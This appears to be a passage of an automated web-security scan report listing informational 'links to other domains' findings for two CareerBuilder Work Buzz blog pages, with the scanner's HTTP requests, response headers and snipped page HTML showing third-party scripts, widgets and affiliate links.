<td style="padding-left:10px; vertical-align:middle; padding-bottom:10px;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.twitter.com/stylemepretty">Follow us on <b>
...[SNIP]...
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-25H0h4A4rJexA.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

22.487. http://www.theworkbuzz.com/employment-trends/video-interviews/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworkbuzz.com
Path:   /employment-trends/video-interviews/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /employment-trends/video-interviews/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:31 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6605>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Sun, 30-Jan-2011 02:18:52 GMT
Set-Cookie: X-Mapping-caklakng=EC453BC60E321747B8F3814F4BC289A4; path=/
Content-Length: 60025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.redacted/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.redacted">MSN home</a></li><li><a href="http://hotmail.msn.com">Mail</a></li><li><a href="http://my.redacted">My MSN</a></li><li class="MSNlast"><a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1241134192&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314"
class="MSNdMSNME_1">
Sign in</a>
...[SNIP]...
<li class="MSNfirst MSNselected"><a href="http://health.msn.com">health</a></li><li><a
href="http://moneycentral.redacted">
money</a></li><li><a href="http://www.bing.com/travel?cid=msn_careers">
travel</a>
...[SNIP]...
<li><a href="http://tech.redacted/">tech</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://mail.live.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Hotmail" /><span>
...[SNIP]...
<li><a href="http://im.live.com/messenger/im/home/?source=MSNTDLINK" id="MSNmsg"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Messenger" /><span>
...[SNIP]...
<li><a href="http://my.redacted"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="My MSN" /><span>
...[SNIP]...
<li class="MSNlast"><a href="http://ie8.redacted/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Internet Explorer 8" /><span>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.bing.com/travel?cid=msn_careers">Airfares &amp; Travel</a>
...[SNIP]...
<li><a href="http://autos.msn.com/default.aspx">Autos</a></li><li><a href="http://careers.msn.com">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://cityguides.redacted">City Guides</a>
...[SNIP]...
<li class="MSNlast"><a href="http://msn.match.com/index.aspx?TrackingID=516163&amp;BannerID=543351 ">Dating &amp; Personals</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://msn.delish.com/">Food &amp; Entertaining</a>
...[SNIP]...
<li><a href="http://games.msn.com">Games</a></li><li><a href="http://health.msn.com">Health &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li class="MSNlast"><a href="http://lifestyle.redacted/default.aspx">Lifestyle</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://maps.live.com/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNH">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com">Music</a></li><li class="MSNlast"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://realestate.redacted">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://g.redacted/0AD00036/931292.1??HCType=1&amp;CID=931292&amp;PG=SHPHDR">Shopping</a></li><li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://tech.redacted">Tech &amp; Gadgets</a>
...[SNIP]...
<li class="MSNlast"><a href="http://tv.redacted">TV</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://weather.msn.com">Weather</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.wonderwall.com/">Wonderwall</a></li><li><a href="http://yellowpages.redacted">Yellow Pages</a>
...[SNIP]...
<li class="MSNlast"><a href="http://specials.msn.com/alphabet.aspx">MSN Directory</a>
...[SNIP]...
<div id="MSNlogo">
<a href="http://www.redacted">
<img src="http://blstc.redacted/br/gbl/lg/1/l/msft.gif" alt="go to redacted"
width="118" height="35" />
</a><a class="MSNname" href="http://careers.msn.com">careers</a>
...[SNIP]...
<span><a href="http://latino.msn.com/empleos/">Espa&ntilde;ol</a>
...[SNIP]...
<div class="facebook_like"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F&amp;layout=button_count&amp;show_faces=false&amp;width=130&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="tweet_button">
                    <a href="http://twitter.com/share?url=http://www.theworkbuzz.com/employment-trends/video-interviews/&amp;via=careerbuilder&amp;count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
<p>Recently, CareerBuilder began offering a tool for <a href="http://www.careerbuilder.com/jobposter/products/page.aspx?pagever=OnlineInterviewsDemo&amp;template=none&amp;cachebypass=ye$">companies to use online video interviews</a>
...[SNIP]...
coming years, we wanted to give you some tips that will put you ahead of other job seekers. To get insight on how a job seeker should approach a video interview, we talked to Jennifer Flaa, the CEO of <a href="http://www.vettannatogo.com/">Vettanna ToGo</a>
...[SNIP]...
</div>
<script type="text/javascript" charset="utf-8" src="http://w.sharethis.com/widget/?wp=2.6.1&publisher=16298438-73ee-4f37-8234-2c6423690e18"></script>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong><a href='http://www.onlinejobapplicationsblog.com' rel='external nofollow' class='url'>Nick</a>
...[SNIP]...
<strong><a href='http://www.hillgrp.com' rel='external nofollow' class='url'>Francesca</a>
...[SNIP]...
<strong><a href='http://msn' rel='external nofollow' class='url'>LARock</a>
...[SNIP]...
<strong><a href='http://www.contemporaryconcepts.org' rel='external nofollow' class='url'>Sandra</a>
...[SNIP]...
<strong>From <a href='http://topsy.com/trackback?url=http%3A%2F%2Fwww.theworkbuzz.com%2Femployment-trends%2Fvideo-interviews%2F%3Fgt1%3D23000&#038;utm_source=pingback&#038;utm_campaign=L2' rel='external nofollow' class='url'>Tweets that mention Are you ready for video interviews? : The Work Buzz -- Topsy.com</a>
...[SNIP]...
<div class="textwidget"><a href="http://www.careerbuilder.com?lr=workbuzz&siteid=rkbuzzlg" alt="CareerBuilder.com"><img src="http://img.icbdr.com/images/plink/logos/powered_by_cb_logo.gif" border="0" /></a>
...[SNIP]...
<li id="twitter-follow"><a href="http://twitter.com/CareerBuilder" rel="external">Twitter</a></li><li id="facebook-follow"><a href="http://www.facebook.com/careerbuilder" rel="external">Facebook</a>
...[SNIP]...
<br>
<img src=http://img.icbdr.com/images/pixel.gif width=1 height=1 vspace=2><br>
...[SNIP]...
<td style=padding-top:8px;>&nbsp;&nbsp;-&nbsp;<a href="http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx?lr=workbuzz&siteid=workbuzz003">
           <font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<td style=padding-bottom:12px;>&nbsp;&nbsp;-&nbsp;<a href="http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx?lr=workbuzz&siteid=workbuzz003"><font face="arial,helvetica" size="1" style="font-size:11px;" color="000066">
...[SNIP]...
<div class="textwidget"><a href="http://alltop.com/"><img src="http://badges.alltop.com/images/alltop_170x30_we2.jpg" width="170" height="30" alt="Alltop. We're kind of a big deal." /></a>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<div style="font-size:8px; padding-left:10px"><a href="http://www.facebook.com/careerbuilder">CareerBuilder on Facebook</a>
...[SNIP]...
<li><a href="http://www.blackcareers.com/" title="Black Careers">Black Careers</a>
...[SNIP]...
<li><a href="http://www.careerrookie.com/" title="CBcampus">Career Rookie</a>
...[SNIP]...
<li><a href="http://www.cbinstitute.com" title="CBInstitute">CBInstitute</a>
...[SNIP]...
<li><a href="http://www.cbresume.com" title="cbResume">cbResume</a></li>
<li><a href="http://www.CBSalary.com" title="CBsalary">CBsalary.com</a>
...[SNIP]...
<li><a href="http://www.careerpath.com" title="CareerPath">CareerPath</a>
...[SNIP]...
<li><a href="http://www.degreedriven.com" title="DegreeDriven">DegreeDriven</a>
...[SNIP]...
<li><a href="http://www.empleoscb.com" title="Empleos">Empleoscb</a></li>
<li><a href="http://www.employmentspot.com" title="Employment Spot">Employment Spot</a>
...[SNIP]...
<li><a href="http://www.jobs.net" title="Jobs.net">Jobs.net</a></li>
<li><a href="http://www.personified.com/">Personified</a>
...[SNIP]...
<li><a href="http://www.primecb.com/">PrimeCB</a></li>
<li><a href="http://www.truecareers.com" title="True Careers">True Careers</a>
...[SNIP]...
<li><a href="http://workinretail.com" title="WorkInRetail">WorkInRetail</a>
...[SNIP]...
<li><a href="http://www.thehiringsite.com/">The Hiring Site</a>
...[SNIP]...
<li><a href="http://askamanager.blogspot.com/">Ask A Manager</a>
...[SNIP]...
<li><a href="http://www.spherioncareerblog.com/">Big Time</a></li>
<li><a href="http://www.blogher.com/topic/business-career-personal-finance">BlogHer</a></li>
<li><a href="http://www.brazencareerist.com/">Brazen Careerist</a>
...[SNIP]...
<li><a href="http://www.careerhubblog.com/">CareerHub</a></li>
<li><a href="http://careerealism.wordpress.com/" title="Careerealism">Careerealism</a>
...[SNIP]...
<li><a href="http://blogs.wsj.com/laidoff/?mod=blogmod" target="_blank">CareerJournal: Laid Off and Looking</a>
...[SNIP]...
<li><a href="http://manpowerblogs.com/holmes/">Contemporary Working</a>
...[SNIP]...
<li><a href="http://www.employmentblawg.com/">Employment Blawg</a>
...[SNIP]...
<li><a href="http://evilhrlady.blogspot.com/">Evil HR Lady</a>
...[SNIP]...
<li><a href="http://www.fastcompany.com/blogs">Fast Company</a>
...[SNIP]...
<li><a href="http://www.fistfuloftalent.com/">Fistful of Talent</a>
...[SNIP]...
<li><a href="http://blog.generationrelations.com/" title="Generation Relations">Generation Relations</a>
...[SNIP]...
<li><a href="http://hrminion.blogspot.com/">HR Minion</a></li>
<li><a href="http://hrwench.blogspot.com/">HR Wench</a></li>
<li><a href="http://www.huffingtonpost.com/business/">HuffPost Business Blogs</a>
...[SNIP]...
<li><a href="http://www.humancapitalist.com/">Human Capitalist</a>
...[SNIP]...
<li><a href="http://www.jibberjobber.com/login.php">Jibber Jobber</a>
...[SNIP]...
<li><a href="http://www.jobsearchmarketing.com/">JobSearch Marketing Blog</a>
...[SNIP]...
<li><a href="http://www.jtodonnell.com/wordpress/" title="Career Insights">J.T. O&#8217;Donnell: Career Insights</a>
...[SNIP]...
<li><a href="http://keppiecareers.wordpress.com/">Keppie Careers</a>
...[SNIP]...
<li><a href="http://www.leapwalking.com/">Leap Walking</a>
...[SNIP]...
<li><a href="http://www.momsrising.org/momsblogging/">Moms Rising</a>
...[SNIP]...
<li><a href="http://blogs.msdn.com/heatherleigh/default.aspx">One Louder</a>
...[SNIP]...
<li><a href="http://www.usnews.com/blogs/outside-voices-careers/index.html">Outside Voices: Careers</a>
...[SNIP]...
<li><a href="http://blog.penelopetrunk.com/">Penelope Trunk</a>
...[SNIP]...
<li><a href="http://personalbrandingblog.wordpress.com/">Personal Branding</a>
...[SNIP]...
<li><a href="http://punkrockhr.com/">Punk Rock HR</a>
...[SNIP]...
<li><a href="http://sethgodin.typepad.com/" title="Seth Godin">Seth Godin</a>
...[SNIP]...
<li><a href="http://shiftingcareers.blogs.nytimes.com/">Shifting Careers</a>
...[SNIP]...
<li><a href="http://www.thefutureofwork.net/blog/">The Future of Work</a>
...[SNIP]...
<li><a href="http://alexandralevit.typepad.com" rel="colleague" target="_blank">Water Cooler Wisdom</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/womenomics/" title="ABC News &#8211; Womenomics">Womenomics</a>
...[SNIP]...
<p>&copy; Copyright <a href="http://www.careerbuilder.com/?SiteId=workbuzz004">CareerBuilder.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.wildfireapp.com/website/302/companies/130300/widget_loader.js"></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://g.redacted/2privacy/enus">MSN privacy</a>
...[SNIP]...
<li><a
href="http://g.redacted/0TO_/enus">
Legal</a></li><li><a href="http://advertising.redacted/home/home.asp">
Advertise</a>
...[SNIP]...
<li class="last"><a href="http://rss.redacted">RSS</a>
...[SNIP]...
<li class="MSNfirst"><a onclick="return Msn.Navigation.OpenPopup(this,'width=800,height=600,resizeable=no,status=no,titlebar=no,toolbar=no')"
href="http://careers.msn.com/help.aspx">
Help</a></li><li class="MSNlast"><a href="https://feedback.redacted/default.aspx?productkey=careers&amp;mkt=en-us">Feedback</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-803759h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...

22.488. http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theworkbuzz.com
Path:   /fun-stuff/your-work-soundtrack/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /fun-stuff/your-work-soundtrack/?cobrand=msn&utm_source=MSN&utm_medium=MSNJM&utm_campaign=MSNCareers HTTP/1.1
Host: www.theworkbuzz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 29 Jan 2011 23:55:41 GMT
X-Pingback: http://www.theworkbuzz.com/xmlrpc.php
Link: <http://www.theworkbuzz.com/?p=6495>; rel=shortlink
Connection: close
Set-Cookie: WP-Cobrand=msn; expires=Sun, 30-Jan-2011 02:19:04 GMT
Set-Cookie: X-Mapping-caklakng=46B1EFBB3B916447A34716FB66E1BFF9; path=/
Content-Length: 57465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/
...[SNIP]...
</script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/2/report.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://blstj.redacted/br/gbl/js/4/navigation.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://ads1.redacted/library/dap.js?ver=3.0.4'></script>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.redacted">MSN home</a></li><li><a href="http://hotmail.msn.com">Mail</a></li><li><a href="http://my.redacted">My MSN</a></li><li class="MSNlast"><a href="http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=10&amp;ct=1241134192&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fcareers.redacted%2F&amp;lc=1033&amp;id=74314"
class="MSNdMSNME_1">
Sign in</a>
...[SNIP]...
<li class="MSNfirst MSNselected"><a href="http://health.msn.com">health</a></li><li><a
href="http://moneycentral.redacted">
money</a></li><li><a href="http://www.bing.com/travel?cid=msn_careers">
travel</a>
...[SNIP]...
<li><a href="http://tech.redacted/">tech</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://mail.live.com"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Hotmail" /><span>
...[SNIP]...
<li><a href="http://im.live.com/messenger/im/home/?source=MSNTDLINK" id="MSNmsg"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Messenger" /><span>
...[SNIP]...
<li><a href="http://my.redacted"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="My MSN" /><span>
...[SNIP]...
<li class="MSNlast"><a href="http://ie8.redacted/microsoft/internet-explorer-8/en-us/ie8.aspx?ocid=B037MSN55C0403A"><img src="http://tk2.stb.s-msn.com/i/96/5146F629B72E6A89B01B5FF61E30B8.gif" width="25" height="20" alt="Internet Explorer 8" /><span>
...[SNIP]...
<li class="MSNfirst"><a href="http://www.bing.com/travel?cid=msn_careers">Airfares &amp; Travel</a>
...[SNIP]...
<li><a href="http://autos.msn.com/default.aspx">Autos</a></li><li><a href="http://careers.msn.com">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://cityguides.redacted">City Guides</a>
...[SNIP]...
<li class="MSNlast"><a href="http://msn.match.com/index.aspx?TrackingID=516163&amp;BannerID=543351 ">Dating &amp; Personals</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://msn.delish.com/">Food &amp; Entertaining</a>
...[SNIP]...
<li><a href="http://games.msn.com">Games</a></li><li><a href="http://health.msn.com">Health &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li class="MSNlast"><a href="http://lifestyle.redacted/default.aspx">Lifestyle</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://maps.live.com/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNH">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com">Music</a></li><li class="MSNlast"><a href="http://www.msnbc.redacted/">News</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://realestate.redacted">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://g.redacted/0AD00036/931292.1??HCType=1&amp;CID=931292&amp;PG=SHPHDR">Shopping</a></li><li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://tech.redacted">Tech &amp; Gadgets</a>
...[SNIP]...
<li class="MSNlast"><a href="http://tv.redacted">TV</a>
...[SNIP]...
<li class="MSNfirst"><a href="http://weather.msn.com">Weather</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.wonderwall.com/">Wonderwall</a></li><li><a href="http://yellowpages.redacted">Yellow Pages</a>
...[SNIP]...
<li class="MSNlast"><a href="http://specials.msn.com/alphabet.aspx">MSN Directory</a>
...[SNIP]...
<div id="MSNlogo">
<a href="http://www.redacted">
<img src="http://blstc.redacted/br/gbl/lg/1/l/msft.gif" alt="go to redacted"
width="118" height="35" />
</a><a class="MSNname" href="http://careers.msn.com">careers</a>
...[SNIP]...
<span><a href="http://latino.msn.com/empleos/">Espa&ntilde;ol</a>
...[SNIP]...
<div class="facebook_like"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.theworkbuzz.com%2Ffun-stuff%2Fyour-work-soundtrack%2F&amp;layout=button_count&amp;show_faces=false&amp;width=130&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="tweet_button">
                    <a href="http://twitter.com/share?url=http://www.theworkbuzz.com/fun-stuff/your-work-soundtrack/&amp;via=careerbuilder&amp;count=horizontal" class="twitter-share-button">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="linkedin_share">
                   <script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</a>Listening to the right song can make you feel better about anything, like <a href="http://www.fitnessmagazine.com/workout/music/popular-playlists/the-fitness-top-100-workout-songs/">running on a treadmill</a>, <a href="http://www.youtube.com/watch?v=q8zx68HENIA">being broke</a>..or <a href="http://www.youtube.com/watch?v=i3MXiTeH_Pg&amp;ob=av2em">not getting winked at on Match.com</a>...Fortunately, since we all get a little grumpy about <a href="http://www.youtube.com/watch?v=9N2CANatVYQ" target="_blank">workin&#8217; for a livin&#8217;</a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fbang-the-drum-all-day%252Fid107636259%253Fi%253D107636085%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Bang the Drum All Day - The Very Best of Todd Rundgren" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fmusique-vol-1-1993-2005%252Fid133708728%253Fuo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Musique, Vol. 1 (1993-2005) - Daft Punk" /></a>
...[SNIP]...
</strong><a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ftake-this-job-and-shove-it%252Fid18453611%253Fi%253D18453581%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><strong><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Take This Job and Shove It - Johnny Paycheck: 15 All-Time Greatest Hits (Re-Recorded Versions)" /></strong>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fjust-who-i-am-poets-pirates%252Fid262139788%253Fuo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Just Who I Am: Poets &amp; Pirates - Kenny Chesney" /></a>
...[SNIP]...
</strong><a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fa-hard-days-night%252Fid402060584%253Fi%253D402060914%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="A Hard Day's Night - A Hard Day's Night" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fshe-works-hard-for-the-money%252Fid1953992%253Fuo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="She Works Hard for the Money - Donna Summer" /></a>
...[SNIP]...
</strong><a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Ffor-the-love-of-money%252Fid158960620%253Fi%253D158960641%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><strong><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="For the Love of Money - The Essential O'Jays" /></strong>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fworking-on-the-highway%252Fid203708420%253Fi%253D203708785%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Working On the Highway - Born In the U.S.A." /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fman-in-the-mirror%252Fid159292399%253Fi%253D159294478%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Man In the Mirror - The Essential Michael Jackson" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fmanic-monday%252Fid200007310%253Fi%253D200007628%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Manic Monday - Bangles: Greatest Hits" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fits-my-life%252Fid397237803%253Fi%253D397237927%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="It's My Life - Bon Jovi Greatest Hits - The Ultimate Collection" /></a>
...[SNIP]...
</strong> <a href="http://click.linksynergy.com/fs-bin/stat?id=z1aK0OXh3KY&amp;offerid=146261&amp;type=3&amp;subid=0&amp;tmpid=1826&amp;RD_PARM1=http%253A%252F%252Fitunes.apple.com%252Fus%252Falbum%252Fbig-boss-man%252Fid283284190%253Fi%253D283284203%2526uo%253D4%2526partnerId%253D30" target="itunes_store"><img style="border: 0" src="http://ax.phobos.apple.com.edgesuite.net/images/web/linkmaker/badge_itunes-sm.gif" alt="Big Boss Man - Big Boss Man" /></a>
...[SNIP]...
